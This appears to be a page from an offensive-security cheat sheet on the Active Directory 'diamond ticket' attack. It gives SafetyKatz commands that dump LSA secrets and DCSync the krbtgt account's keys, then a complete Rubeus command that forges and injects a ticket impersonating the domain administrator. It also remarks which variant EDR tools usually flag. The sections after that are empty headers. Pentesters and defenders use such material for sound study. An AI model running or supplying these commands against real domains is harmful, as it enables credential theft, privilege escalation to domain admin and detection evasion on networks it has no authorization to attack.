diamond-ticket

Methodology

  1. Retrieve the AES-256 key or RC4 hash of the service account.

  2. Modify and inject the ticket.

  3. Impersonate any user

Binaries

[!INFO] Remember to follow the Binaries methodology

SafetyKatz

Retrieve the AES-256 key of the service account:

SafetyKatz.exe '"lsadump::lsa /patch"'
SafetyKatz.exe '"lsadump::dcsync /user:contoso\krbtgt"'

Rubeus

Create a diamond ticket:

With an NTLM hash (Usually flagged by EDRs)

Rubeus.exe diamond /krbkey:32ED87BDB5FDC5E9CBA88547376818D4 /user:studentuserx /password:studentuserxpassword /enctype:rc4 /ticketuser:administrator /domain:us.contoso.local /dc:US-DC.us.contoso.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

With an AES-256 key (Admin cmd required)

With access to a domain account

Last updated